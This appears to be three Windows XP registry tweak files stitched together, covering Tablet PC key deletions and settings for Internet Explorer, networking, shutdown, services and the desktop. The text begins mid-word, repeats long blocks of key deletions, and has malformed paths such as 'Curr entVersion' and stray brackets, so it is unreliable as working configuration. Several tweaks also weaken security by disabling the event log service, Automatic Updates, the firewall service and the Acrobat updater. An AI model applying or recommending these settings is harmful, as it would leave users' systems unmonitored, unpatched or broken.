Turcic);[-HKEY_CLASSES_ROOT\AppID\{7F429620-16D1-471E-A81A-114992148034}][-HKEY_CLASSES_ROOT\AppID\wisptis.EXE][-HKEY_CLASSES_ROOT\CLSID\{04A1E553-FE36-4FDE-865E-344194E69424}][-HKEY_CLASSES_ROOT\CLSID\{13DE4A42-8D21-4C8E-BF9C-8F69CB068FCA}][-HKEY_CLASSES_ROOT\CLSID\{242025BB-8546-48B6-B9B0-F4406C54ACFC}][-HKEY_CLASSES_ROOT\CLSID\{3336B8BF-45AF-429F-85CB-8C435FBF21E4}][-HKEY_CLASSES_ROOT\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}][-HKEY_CLASSES_ROOT\CLSID\{43B07326-AAE0-4B62-A83D-5FD768B7353C}][-HKEY_CLASSES_ROOT\AppID\{7F429620-16D1-471E-A81A-114992148034}][-HKEY_CLASSES_ROOT\AppID\wisptis.EXE][-HKEY_CLASSES_ROOT\CLSID\{04A1E553-FE36-4FDE-865E-344194E69424}][-HKEY_CLASSES_ROOT\CLSID\{13DE4A42-8D21-4C8E-BF9C-8F69CB068FCA}][-HKEY_CLASSES_ROOT\CLSID\{242025BB-8546-48B6-B9B0-F4406C54ACFC}][-HKEY_CLASSES_ROOT\CLSID\{3336B8BF-45AF-429F-85CB-8C435FBF21E4}][-HKEY_CLASSES_ROOT\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}][-HKEY_CLASSES_ROOT\CLSID\{43B07326-AAE0-4B62-A83D-5FD768B7353C}][-HKEY_CLASSES_ROOT\CLSID\{43FB1553-AD74-4EE8-88E4-3E6DAAC915DB}][-HKEY_CLASSES_ROOT\CLSID\{524B13ED-2E57-40B8-B801-5FA35122EB5C}][-HKEY_CLASSES_ROOT\CLSID\{632A2D3D-86AF-411A-8654-7511B51B3D5F}][-HKEY_CLASSES_ROOT\CLSID\{65D00646-CDE3-4A88-9163-6769F0F1A97D}][-HKEY_CLASSES_ROOT\CLSID\{6E4FCB12-510A-4D40-9304-1DA10AE9147C}][-HKEY_CLASSES_ROOT\CLSID\{786CDB70-1628-44A0-853C-5D340A499137}][-HKEY_CLASSES_ROOT\CLSID\{836FA1B6-1190-4005-B434-7ED921BE2026}][-HKEY_CLASSES_ROOT\CLSID\{8770D941-A63A-4671-A375-2855A18EBA73}][-HKEY_CLASSES_ROOT\CLSID\{8854F6A0-4683-4AE7-9191-752FE64612C3}][-HKEY_CLASSES_ROOT\CLSID\{937C1A34-151D-4610-9CA6-A8CC9BDB5D83}][-HKEY_CLASSES_ROOT\CLSID\{9C1CC6E4-D7EB-4EEB-9091-15A7C8791ED9}][-HKEY_CLASSES_ROOT\CLSID\{9DE85094-F71F-44F1-8471-15A2FA76FCF3}][-HKEY_CLASSES_ROOT\CLSID\{9FD4E808-F6E6-4E65-98D3-AA39054C1255}][-HKEY_CLASSES_ROOT\CLSID\{A5558507-9B96-46BA-94ED-982E684A9A6B}][-HKEY_CLASSES_ROOT\CLSID\{A5B020FD-E04B-4E67-B65A-E7DEED25B2CF}][-HKEY_CLASSES_ROOT\CLSID\{AAC46A37-9229-4FC0-8CCE-4497569BF4D1}][-HKEY_CLASSES_ROOT\CLSID\{C52FF1FD-EB6C-42CF-9140-83DEFECA7E29}][-HKEY_CLASSES_ROOT\CLSID\{D8BF32A2-05A5-44C3-B3AA-5E80AC7D2576}][-HKEY_CLASSES_ROOT\CLSID\{DE815B00-9460-4F6E-9471-892ED2275EA5}][-HKEY_CLASSES_ROOT\CLSID\{E3D5D93C-1663-4A78-A1A7-22375DFEBAEE}][-HKEY_CLASSES_ROOT\CLSID\{E5CA59F5-57C4-4DD8-9BD6-1DEEEDD27AF4}][-HKEY_CLASSES_ROOT\CLSID\{E9A6AB1B-0C9C-44AC-966E-560C2771D1E8}][-HKEY_CLASSES_ROOT\CLSID\{EFB4A0CB-A01F-451C-B6B7-56F02F77D76F}][-HKEY_CLASSES_ROOT\CLSID\{F0291081-E87C-4E07-97DA-A0A03761E586}][-HKEY_CLASSES_ROOT\CLSID\{43FB1553-AD74-4EE8-88E4-3E6DAAC915DB}][-HKEY_CLASSES_ROOT\CLSID\{524B13ED-2E57-40B8-B801-5FA35122EB5C}][-HKEY_CLASSES_ROOT\CLSID\{632A2D3D-86AF-411A-8654-7511B51B3D5F}][-HKEY_CLASSES_ROOT\CLSID\{65D00646-CDE3-4A88-9163-6769F0F1A97D}][-HKEY_CLASSES_ROOT\CLSID\{6E4FCB12-510A-4D40-9304-1DA10AE9147C}][-HKEY_CLASSES_ROOT\CLSID\{786CDB70-1628-44A0-853C-5D340A499137}][-HKEY_CLASSES_ROOT\CLSID\{836FA1B6-1190-4005-B434-7ED921BE2026}][-HKEY_CLASSES_ROOT\CLSID\{8770D941-A63A-4671-A375-2855A18EBA73}][-HKEY_CLASSES_ROOT\CLSID\{8854F6A0-4683-4AE7-9191-752FE64612C3}][-HKEY_CLASSES_ROOT\CLSID\{937C1A34-151D-4610-9CA6-A8CC9BDB5D83}][-HKEY_CLASSES_ROOT\CLSID\{9C1CC6E4-D7EB-4EEB-9091-15A7C8791ED9}][-HKEY_CLASSES_ROOT\CLSID\{9DE85094-F71F-44F1-8471-15A2FA76FCF3}][-HKEY_CLASSES_ROOT\CLSID\{9FD4E808-F6E6-4E65-98D3-AA39054C1255}][-HKEY_CLASSES_ROOT\CLSID\{A5558507-9B96-46BA-94ED-982E684A9A6B}][-HKEY_CLASSES_ROOT\CLSID\{A5B020FD-E04B-4E67-B65A-E7DEED25B2CF}][-HKEY_CLASSES_ROOT\CLSID\{AAC46A37-9229-4FC0-8CCE-4497569BF4D1}][-HKEY_CLASSES_ROOT\CLSID\{C52FF1FD-EB6C-42CF-9140-83DEFECA7E29}][-HKEY_CLASSES_ROOT\CLSID\{D8BF32A2-05A5-44C3-B3AA-5E80AC7D2576}][-HKEY_CLASSES_ROOT\CLSID\{DE815B00-9460-4F6E-9471-892ED2275EA5}][-HKEY_CLASSES_ROOT\CLSID\{E3D5D93C-1663-4A78-A1A7-22375DFEBAEE}][-HKEY_CLASSES_ROOT\CLSID\{E5CA59F5-57C4-4DD8-9BD6-1DEEEDD27AF4}][-HKEY_CLASSES_ROOT\CLSID\{E9A6AB1B-0C9C-44AC-966E-560C2771D1E8}][-HKEY_CLASSES_ROOT\CLSID\{EFB4A0CB-A01F-451C-B6B7-56F02F77D76F}][-HKEY_CLASSES_ROOT\CLSID\{F0291081-E87C-4E07-97DA-A0A03761E586}][-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1125549C421D34E4DBF1036F62580BE1][-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\652A08B235C6DFF4C8CD41B52DE68CA4][-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9B4B5940D4625D64C85532B8CDE3BF4D][-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D656DA4A9E277A34D90D5E6FFA34E827][-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\7040110900063D11C8EF10054038389C\Features\WISPFiles][-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\7040110900063D11C8EF10054038389C\Features\WISPHidden][-HKEY_CLASSES_ROOT\TpcCom][-HKEY_CLASSES_ROOT\TpcCom.ClassicW][-HKEY_CLASSES_ROOT\TpcCom.ClassicW.1][-HKEY_CLASSES_ROOT\TpcCom.DrawAttrs][-HKEY_CLASSES_ROOT\TpcCom.DrawAttrs.1][-HKEY_CLASSES_ROOT\TpcCom.DrawAttrsXP][-HKEY_CLASSES_ROOT\TpcCom.DrawAttrsXP.1][-HKEY_CLASSES_ROOT\TpcCom.GenericRecognizer][-HKEY_CLASSES_ROOT\TpcCom.GenericRecognizer.1][-HKEY_CLASSES_ROOT\TpcCom.InkObject][-HKEY_CLASSES_ROOT\TpcCom.InkObject.1][-HKEY_CLASSES_ROOT\TpcCom.InkObjectXP][-HKEY_CLASSES_ROOT\TpcCom.InkObjectXP.1][-HKEY_CLASSES_ROOT\TpcCom.InkSettings.1][-HKEY_CLASSES_ROOT\TpcCom.Lattice.1][-HKEY_CLASSES_ROOT\TpcCom.RecoManager][-HKEY_CLASSES_ROOT\TpcCom.RecoManager.1][-HKEY_CLASSES_ROOT\TpcCom.TabletManager][-HKEY_CLASSES_ROOT\TpcCom.TabletManager.1][-HKEY_CLASSES_ROOT\TpcCom.UserDictionary][-HKEY_CLASSES_ROOT\TpcCom.UserDictionary.1][-HKEY_CLASSES_ROOT\TypeLib\{194508A0-B8D1-473E-A9B6-851AAF726A6D}][-HKEY_CLASSES_ROOT\TypeLib\{56D04F5D-964F-4DBF-8D23-B97989E53418}][-HKEY_CLASSES_ROOT\TypeLib\{773F1B9A-35B9-4E95-83A0-A210F2DE3B37}][-HKEY_CLASSES_ROOT\TypeLib\{7D868ACD-1A5D-4A47-A247-F39741353012}][-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Installer\UserData\S-1-5-18\Components\1125549C421D34E4DBF1036F62580BE1][-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Installer\UserData\S-1-5-18\Components\652A08B235C6DFF4C8CD41B52DE68CA4][-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Installer\UserData\S-1-5-18\Components\9B4B5940D4625D64C85532B8CDE3BF4D][-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Installer\UserData\S-1-5-18\Components\D656DA4A9E277A34D90D5E6FFA34E827][-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Installer\UserData\S-1-5-18\Products\7040110900063D11C8EF10054038389C\Features\WISPFiles][-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Installer\UserData\S-1-5-18\Products\7040110900063D11C8EF10054038389C\Features\WISPHidden]
PART 2
Windows Registry Editor Version 5.00
;============================================================================;================ SOFTWARE / INTERNET EXPLORER TWEAKS =======================;============================================================================
; Disable Auto-Complete Prompt[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms]"AskUser"=dword:00000000
; Set HomePage[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]"Start Page"="www.google.ca"
; Empty Temporary Internet Files Folder When Browser Is Closed[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache]"Persistent"=dword:00000000[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache]"Persistent"=dword:00000000
; Max Internet Explorer Simultaneous Downloads To 10[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings]"MaxConnectionsPer1_0Server"=dword:0000000a"MaxConnectionsPerServer"=dword:0000000a
; Remove 'Links' Folder From Favorites[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar]"Locked"=dword:00000001"LinksFolderName"=""
; Disable Auto Re-Size Of Images[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]"Enable AutoImageResize"="no"
; Enable Status Bar[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]"StatusBarWeb"=dword:00000001"StatusBarOther"=dword:00000001
; Disable Spying By Websites[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults]"about"=dword:00000004
; Set Google As Default Search Page[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search]"SearchAssistant"="http://www.google.com/ie"
;============================================================================;=================== SOFTWARE / MEDIA PLAYER TWEAKS ========================;============================================================================
; Disable Media Player EULA[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsMediaPlayer]"GroupPrivacyAcceptance"=dword:00000001
; Enable DVD Features in Media Player[HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Settings]"EnableDVDUI"="yes"
;============================================================================;================== SOFTWARE / OUTLOOK EXPRESS TWEAKS ======================;============================================================================
; Remove Windows Messenger from Outlook Express[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Outlook Express]"Hide Messenger"=dword:00000002
; Block .exe Attachments in Outlook Express[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Outlook Express]"BlockExeAttachments"=dword:00000001
;============================================================================;======================= SOFTWARE / OTHER TWEAKS ===========================;============================================================================
; Disable Adobe Acrobat Reader EULA[HKEY_LOCAL_MACHINE\SOFTWARE\Adobe\Acrobat Reader\6.0\AdobeViewer]"EULA"=dword:00000001
; Disable Adobe Acrobat Reader Automatic Updates[HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\6.0\Updater]"iUpdateFrequency"=dword:00000000
; Disable Adobe Acrobat Reader Splash Screen[HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\6.0\Originals]"bDisplayAboutDialog"=dword:00000000
; Enable StatusBar in Notepad[HKEY_CURRENT_USER\Software\Microsoft\Notepad]"StatusBar"=dword:00000001
; Enable Word Wrap in Notepad[HKEY_CURRENT_USER\Software\Microsoft\Notepad]"fWrap"=dword:00000001
; Open .nfo Files in Notepad[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.nfo]"Application"="NOTEPAD.EXE"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.nfo\OpenWithList]"a"="Explorer.exe""MRUList"="ba""b"="NOTEPAD.EXE"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.nfo\OpenWithProgids]"MSInfo.Document"=hex(0):
;============================================================================;============================= NETWORK TWEAKS ==============================;============================================================================
; Store more DNS Entries[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]"NegativeCacheTime"=dword:00000000"NetFailureCacheTime"=dword:00000000"NegativeSOACacheTime"=dword:00000000"CacheHashTableBucketSize"=dword:00000001"CacheHashTableSize"=dword:00000180"MaxCacheEntryTtlLimit"=dword:0000fa00"MaxSOACacheEntryTtlLimit"=dword:0000012d
; Maximize Number of Simultaneous Connections[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]"MaxConnectionsPerServer"=dword:00000040"MaxConnectionsPer1_0Server"=dword:00000040
; Enable Faster Web Page Loading[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider]"DnsPriority"=dword:00000001"HostsPriority"=dword:00000001"LocalPriority"=dword:00000001"NetbtPriority"=dword:00000001
; Disable Quality of Service (QoS)[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Psched]"NonBestEffortLimit"=dword:00000000
; Increase Network Throughput[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanworkstation\parameters]"MaxCmds"=dword:00000001"MaxThreads"=dword:00000064"MaxCollectionCount"=dword:00000064
;============================================================================;============================ MULTIMEDIA TWEAKS =============================;============================================================================
; Disable Preview of Movie File Formats[-HKEY_CLASSES_ROOT\.avi\ShellEx][-HKEY_CLASSES_ROOT\.mpg\ShellEx][-HKEY_CLASSES_ROOT\.mpe\ShellEx][-HKEY_CLASSES_ROOT\.mpeg\ShellEx]
; Show Volume Icon in the System Tray[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\SysTray]"Services"=dword:0000001f
; Disable Windows Navigation Sounds[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\Explorer\Navigating\.default]@=" "[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\Explorer\Navigating\.current]@=" "
;============================================================================;======================= STARTUP / SHUTDOWN TWEAKS =========================;============================================================================
; Clear Page File at Shutdown[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]"ClearPageFileAtShutdown"=dword:00000001
; Disable Hibernation[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Power]"Heuristics"=hex:05,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,3f,42,0f,00[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Power]"Heuristics"=hex:05,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,3f,42,0f,00[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Power]"Heuristics"=hex:05,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,3f,42,0f,00
; Disable MSN Messenger from Startup[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]"MsnMsgr"=-
;============================================================================;======================= GENERAL WINDOWS TWEAKS ===========================;============================================================================
; Show File Extensions (.exe/.bmp etc.)[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"HideFileExt"=dword:00000000
; Disable ALL Balloon Tips[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoSMBalloonTip"=dword:00000000
; Disable Windows Tour[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Applets\Tour]"RunCount"=dword:00000000
; Force The Control Panel Classic Display Style[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"ForceClassicControlPanel"=dword:00000001
; Show Detailed Information in Device Manager[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment]"DEVMGR_SHOW_DETAILS"=dword:00000001"DEVMGR_SHOW_NONPRESENT_DEVICES"="1"
; Remove Windows Alexa Spyware[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{c95fe080-8f5d-11d2-a20b-00aa003c157a}]
; Remove Search Dog Assistant[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState]"Use Search Asst"="no"
; Enable Windows 2000 File Sorting Method[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoStrCmpLogical"=dword:00000001
;============================================================================;========================== CONTEXT MENUS TWEAKS ===========================;============================================================================
; Add Control Panel to Right Click Menu of My Computer[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Control Panel\command]@="rundll32.exe shell32.dll,Control_RunDLL"
;============================================================================;=========================== APPEARANCE TWEAKS ============================;============================================================================
; Remove More Themes Online... from Themes Dropdown Box[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\DownloadSites]
; Change Default Desktop Wallpaper[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Desktop\General]"BackupWallpaper"="%Windir%\\Web\\Wallpaper\\lh_bliss.bmp""Wallpaper"="%Windir%\\Web\\Wallpaper\\lh_bliss.bmp"
;============================================================================;============================ DESKTOP TWEAKS ===============================;============================================================================
; Disable Desktop Cleanup Wizard[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz]"NoRun"=dword:00000001
; Remove Shotcut To.. Prefix on Desktop Shorcut Names[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]"Link"=hex:00,00,00,00
; Remove Arrow Overlay from Desktop Shortcuts[HKEY_CLASSES_ROOT\lnkfile]"IsShortcut"=-
; Put My Computer Shortcut on Desktop[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel]"{20D04FE0-3AEA-1069-A2D8-08002B30309D}"=dword:00000000
; Put My Network Places Shortcut on Desktop[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel]"{208D2C60-3AEA-1069-A2D7-08002B30309D}"=dword:00000000
; Put My Documents Shortcut on Desktop[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel]"{450D8FBA-AD25-11D0-98A8-0800361B1103}"=dword:00000000
;============================================================================;====================== SYSTEM PERFORMANCE TWEAKS =========================;============================================================================
; Speed up Opening of My Computer and Windows Explorer[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\stisvc]"Start"=dword:00000004[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoSaveSettings"=dword:00000000[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"NoNetCrawling"=dword:00000001[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoRemoteRecursiveEvents"=dword:00000001
; Speed up Copying/Moving of .ZIP Files[-HKEY_CLASSES_ROOT\.zip\CompressedFolder][-HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}][-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CompressedFolder]
; Speed up Shutdown[HKEY_CURRENT_USER\Control Panel\Desktop]"AutoEndTasks"="1""HungAppTimeout"="100""WaitToKillAppTimeout"="1000"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]"WaitToKillServiceTimeout"="1000"
; Speed up Access to .AVI Media Files[-HKEY_CLASSES_ROOT\CLSID\{87D62D94-71B3-4b9a-9489-5FE6850DC73E}]][-HKEY_CLASSES_ROOT\SystemFileAssociations\.avi\shellex\PropertyHandler][-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87D62D94-71B3-4b9a-9489-5FE6850DC73E}\InProcServer32]
; Speed Up Browsing Remote Computers[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}][-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace\{2227A280-3AEA-1069-A2DE-08002B30309D}]
; Optimize Core System Performance[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]"DisablePagingExecutive"=dword:00000001
;============================================================================;======================= START MENU / TASKBAR TWEAKS =======================;============================================================================
; Remove Language Bar from Taskbar[-HKEY_CLASSES_ROOT\CLSID\{540D8A8B-1C3F-4E32-8132-530F6A502090}]@="Language bar""MenuTextPUI"="@%SystemRoot%\\System32\\msutb.dll,-325"
; Sort Start Menu and Favorites in Alphabetical Order[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder]
; Disable Highlighting of New Applications in Start Menu[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"Start_NotifyNewApps"=dword:00000000

;Delete programs from startup group[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"NeroFilterCheck"=-"nwiz"=-"SunJavaUpdateSched"=-"Picasa Media Detector"=-"MsnMsgr"=-
;Repairs Filters problem with Nero UA install[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}]"UpperFilters"=-"LowerFilters"=-
;Add TweakUI to Control Panel[HKEY_CLASSES_ROOT\CLSID\{D14ED2E1-C75B-443c-BD7C-FC03B2F08C17}]@="TweakUI XP""InfoTip"="Starts the TweakUI program which, allows you to customize advanced options and Settings in Windows to your liking"[HKEY_CLASSES_ROOT\CLSID\{D14ED2E1-C75B-443c-BD7C-FC03B2F08C17}\DefaultIcon]@="%SystemRoot%\\\\System32\\\\tweakui.exe,0"[HKEY_CLASSES_ROOT\CLSID\{D14ED2E1-C75B-443c-BD7C-FC03B2F08C17}\Shell\Open\command]@="tweakui.exe"[HKEY_CLASSES_ROOT\CLSID\{D14ED2E1-C75B-443c-BD7C-FC03B2F08C17}\ShellFolder]"Attributes"=dword:00000030[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D14ED2E1-C75B-443c-BD7C-FC03B2F08C17}]@="Tweak UI
PART 3
Windows Registry Editor Version 5.00;
;=======================================================================; Registery tweaks;=======================================================================;; 1 - Start-up / Shutdown; 2 - Services; 3 - System Performance Tweaks; 4 - General Settings; 5 - Logon; 6 - Visual Settings; 7 - My Computer Right Click; 8 - Context Menus; 9 - Internet Explorer and Outlook Express; 10 - Security; 11 - Multimedia; 12 - Networking; 13 - Other Software; 14 - Win XP SP2; 15 - Unsorted and Untested - be careful before applying these;;;=======================================================================; 1 - Startup / Shutdown;=======================================================================;Allows boot files to be placed optimally on the hard-drive for faster boots.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction]"Enable"="Y"
;Speed up shutdown[HKEY_CURRENT_USER\Control Panel\Desktop]"AutoEndTasks"="1""HungAppTimeout"="100""WaitToKillAppTimeout"="1000"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]"WaitToKillServiceTimeout"="1000"
;Disable Automatic Restart in the event of a BSOD[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl]"AutoReboot"=dword:00000000
;Prefetcher tweak (faster booting) boot and program prefetch use 00000003 or Boot only 00000002[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters]"EnablePrefetcher"=dword:00000002
;Clear the Page File at System Shutdown for security (makes shutdown slower when activated)[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]"ClearPageFileAtShutdown"=dword:00000001
;Disable Hibernate[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Power]"Heuristics"=hex:05,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,3f,42,0f,00
;Disable Shutdown Event Tracker[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Reliability]"ShutdownReasonOn"=dword:00000000"ShutdownReasonUI"=dword:00000000
;=======================================================================; 2 - Services;=======================================================================; Note: Change the values to set the services to automatic, manual or disable; 00000002 = Automatic; 00000003 = Manual; 00000004 = Disabled
;Server[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver]"Start"=dword:00000004
;Portable Media Serial Number Service[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN]"Start"=dword:00000004
;Disable event log[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog]"Start"=dword:00000004
;Disable Net Logon[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon]"Start"=dword:00000003
;Disable Network Provisioning[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xmlprov]"Start"=dword:00000004
;Optimize the Windows Server Service 00000001 = minimize memory,00000002 = balance or 00000003 = maximize network throughput[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]"Size"=dword:00000003
;Disable the Ability to Remotely Shutdown the Computer Browser Service[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MrxSmb\Parameters]"RefuseReset"=dword:00000001
;Automatic Updates[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]"Start"=dword:00000004
;Disable UPS[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPS]"Start"=dword:00000004
;Disable NVIDIA Driver Helper VIDIA Driver Helper Service which gets installed under Windows NT4/2000/XP/2003 by the NVIDIA drivers for some of their graphics cards (or graphics cards based on an NVIDIA chipset).[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NVSvc]"Start"=dword:00000004
; Disable Firewall Service ,Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS) Provides network address translation, addressing, name resolution and/or intrusion prevention services for a home or small office network. Used to allow multiple computers on your network to access the internet via only one account. This service installs on the "modem" computer. If you are using a third party firewall or Internet Connection Sharing software package, this service is not required.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]"Start"=dword:00000004
;Disable Telnet Service ,Enables a remote user to log on to this computer and run programs, and supports various TCP/IP Telnet clients, including; UNIX-based and Windows-based computers. If this service is stopped, remote user access to programs might be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start. This service is not available on Windows XP Home. It allows remote login to the local computer via the telnet function. For security reasons, disable this unless you specifically require its functionality. You will save about 2 MB of RAM by plugging this security hole.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr]"Start"=dword:00000004
; Disable Web Client Service, Enables Windows-based programs to create, access, and modify Internet-based files. If this service is stopped, these functions will not be available. If this service is disabled, any services that explicitly depend on it will fail to start. I have not found a reason to have this service running. I have a hunch that this is going to be required for Microsoft's ".Net Software as a service." For security reasons, I recommend for this service to be disabled. If some MS products, such as MSN Explorer, Media Player, NetMeeting or Messenger fail to provide a particular function, try to enable this service to see if it is” required" for your configuration.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WebClient]"Start"=dword:00000004
